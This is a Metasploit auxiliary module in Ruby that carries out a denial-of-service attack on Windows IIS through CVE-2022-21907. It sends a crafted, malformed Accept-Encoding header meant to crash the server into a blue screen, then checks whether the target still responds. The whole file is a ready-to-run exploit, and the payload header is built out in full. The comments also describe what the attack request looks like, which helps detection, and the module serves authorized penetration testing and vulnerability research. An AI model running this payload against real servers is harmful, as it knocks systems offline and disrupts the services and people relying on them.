# frozen_string_literal: true
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
###
#
# This module performs a DOS attack using a simple HTTP request.
#
###
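class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Dos

  # Registers the module metadata and the TARGETURI option.
  #
  # @param info [Hash] metadata supplied by the framework, merged through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'CVE-2022-21907: HTTP Protocol Stack Remote Code Execution' +
          ' Vulnerability - Windows IIS DOS BlueScreen',
        'Description' => 'This module can be used to perform a DOS attack on' +
          ' IIS server. This module exploit CVE-2022-21907 and causes a Blue' +
          ' Screen with only one payload.',
        'License' => MSF_LICENSE,
        'Author' => ['Maurice LAMBERT <mauricelambert434@gmail.com>'],
        'Platform' => 'win',
        'References' => [
          ['CVE', '2022-21907'],
          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-21907'],
          ['URL', 'https://github.com/mauricelambert/CVE-2022-21907']
        ],
        'DisclosureDate' => '2022-01-11',
        'Notes' => {
          # The description states that the target blue-screens.
          'Stability' => [CRASH_OS_RESTARTS],
          # Left empty: the framework's reliability values describe sessions,
          # and this module creates none.
          'Reliability' => [],
          # IOC_IN_LOGS is a side-effect constant, so it is listed here rather
          # than under Reliability. The request can be recorded by HTTP
          # logging on the target or on devices in front of it.
          'SideEffects' => [IOC_IN_LOGS, SCREEN_EFFECTS]
        }
      )
    )

    register_options(
      [
        OptString.new(
          'TARGETURI', [true, 'The URI of the IIS Server.', '/']
        )
      ]
    )
  end

  ##
  # Sends three GET requests to TARGETURI: a baseline request, one request
  # carrying a malformed Accept-Encoding header, and a follow-up request to
  # see whether the server still answers.
  #
  # For detection, only the second request differs from ordinary traffic: its
  # Accept-Encoding value is long, comma-separated and contains runs of '*'
  # and '&' characters. Hosts carrying the vendor fix for CVE-2022-21907 are
  # expected to keep answering the follow-up request.
  #
  # Aborts through fail_with(Failure::Unreachable) when the baseline request
  # gets no response.
  def run
    request_uri = normalize_uri(target_uri.path, '')

    vprint_status('Trying first connection...')
    res = send_request_cgi(
      'uri' => request_uri,
      'method' => 'GET'
    )

    if res.nil?
      fail_with(
        Failure::Unreachable,
        "#{peer} - Could not connect to web service - no response"
      )
    end

    vprint_good('First connection OK. Sending payload...')
    payload = {
      'Accept-Encoding' => Rex::Text.rand_text_alphanumeric(24) +
        ",&#{Rex::Text.rand_text_alphanumeric(2)}&**" +
        "#{Rex::Text.rand_text_alphanumeric(20)}**" +
        "#{Rex::Text.rand_text_alphanumeric(1)}," +
        "#{Rex::Text.rand_text_alphanumeric(73)}," +
        "#{Rex::Text.rand_text_alphanumeric(71)}," +
        "#{Rex::Text.rand_text_alphanumeric(27)},***************" +
        "*************#{Rex::Text.rand_text_alphanumeric(6)}, *, ,"
    }

    # The response to this request is not used, so it is not stored.
    send_request_cgi({
      'uri' => request_uri,
      'timeout' => 1,
      # short timeout -> the server should not respond
      'method' => 'GET',
      'headers' => payload
    })

    vprint_good('Payload is sent. Check that the server is down...')
    res = send_request_cgi(
      'uri' => request_uri,
      'method' => 'GET'
    )

    # A missing response is read as "down". It cannot tell a crash apart from
    # a network fault or a filtering device dropping the request.
    if res.nil?
      print_good('Target is down.')
    else
      print_error('Target is still responding; it does not appear to be vulnerable.')
    end
  end
end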